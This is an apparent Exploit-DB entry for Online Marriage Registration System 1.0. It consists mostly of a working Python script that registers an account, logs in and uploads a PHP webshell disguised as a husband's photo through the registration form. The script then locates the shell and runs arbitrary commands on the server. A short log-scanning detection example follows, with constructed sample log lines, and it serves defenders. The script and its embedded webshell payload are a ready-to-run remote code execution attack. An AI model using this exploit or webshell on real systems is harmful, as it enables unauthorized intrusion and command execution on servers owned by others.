Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)


HACK1949

# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
# Date: 10/02/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Xampp Server and Wamp Server
# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
# Example with registration:    python3 script.py -u http://172.16.1.102:80/ -c 'whoami' 
# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 

import os
import sys
import random
import argparse
import requests


def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
    parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
    my_args = parser.parse_args()
    return my_args


def login(url, mobile, password):
    url = "%s/user/login.php"%(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    return req.cookies['PHPSESSID']


def upload(url, cookie, file=None):
    url = "%s/user/marriage-reg-form.php"%url
    files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
    req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
    print('[+] PHP shell uploaded')


def get_remote_php_files(url):
    url = "%s/user/images"%(url)
    req = requests.get(url)
    php_files = []
    for i in req.text.split(".php"):
        php_files.append(i[-42:])
    return php_files


def exec_command(url, webshell, command):
    url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
    req = requests.get(url_r)
    print("[+] Command output\n%s"%(req.text))


def register(mobile, password, url):
    url_r = "%s/user/signup.php"%(url)
    data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
    req = requests.post(url_r, data=data)
    print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))


if __name__ == "__main__":
    args = get_args()
    url = args.url
    command = args.command
    mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
    password = "dante123" if args.password is None else args.password
    if args.password is None or args.mobile is None:
        register(mobile,password,url)
    cookie = login(url, mobile, password)
    initial_php_files = get_remote_php_files(url)
    upload(url, cookie)
    final_php_files = get_remote_php_files(url)
    webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
    exec_command(url,webshell,command)
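Added detection example, not part of the original exploit or of OMRS itself: it scans web server access log lines for the artifacts the script above leaves behind on the target, namely a directory listing of /user/images/, any .php file requested from that image directory, a cmd= parameter on such a request, and whether the same client POSTed the marriage-reg-form.php upload form beforehand. The combined log format and the sample lines (including the uploaded file name) are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Assumed Apache/Nginx "combined" log format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_FORM = "/user/marriage-reg-form.php"  # form that accepts husimage/wifeimage uploads
IMAGE_DIR = "/user/images/"                   # should only ever serve image files


def parse_line(line):
    """Parse one combined-format line into a dict, splitting the query string off the path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["path"].partition("?")
    return rec


def detect_omrs_webshell(lines):
    """Return (ip, reason, path) findings for OMRS upload-to-webshell activity."""
    findings = []
    uploads_seen = defaultdict(int)  # ip -> POSTs to the upload form seen so far
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, query = rec["ip"], rec["path"], rec["query"]
        if rec["method"] == "POST" and path.endswith(UPLOAD_FORM):
            uploads_seen[ip] += 1
            continue
        if IMAGE_DIR not in path:
            continue
        if path.endswith(IMAGE_DIR):            # listing of the upload directory
            findings.append((ip, "image_dir_listing", path))
        elif path.lower().endswith(".php"):     # PHP served from an image-only directory
            reason = "webshell_command" if "cmd=" in query else "php_in_image_dir"
            if uploads_seen[ip]:
                reason += "_after_upload"
            findings.append((ip, reason, path))
    return findings


# Constructed sample log lines (not real traffic); the .php name is a placeholder
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2021:10:00:01 +0000] "POST /user/signup.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Feb/2021:10:00:02 +0000] "POST /user/marriage-reg-form.php HTTP/1.1" 200 1024',
    '10.0.0.5 - - [10/Feb/2021:10:00:03 +0000] "GET /user/images/ HTTP/1.1" 200 2048',
    '10.0.0.5 - - [10/Feb/2021:10:00:04 +0000] "GET /user/images/abc123shell.php?cmd=whoami HTTP/1.1" 200 30',
    '10.0.0.9 - - [10/Feb/2021:10:05:00 +0000] "GET /user/images/abc123shell.php HTTP/1.1" 200 0',
    '10.0.0.7 - - [10/Feb/2021:10:06:00 +0000] "GET /user/images/photo.jpg HTTP/1.1" 200 40000',
]
```

Running `detect_omrs_webshell(SAMPLE_LOG)` flags the listing, the command execution after the upload, and the later plain request for the same .php file, while the ordinary image request is ignored.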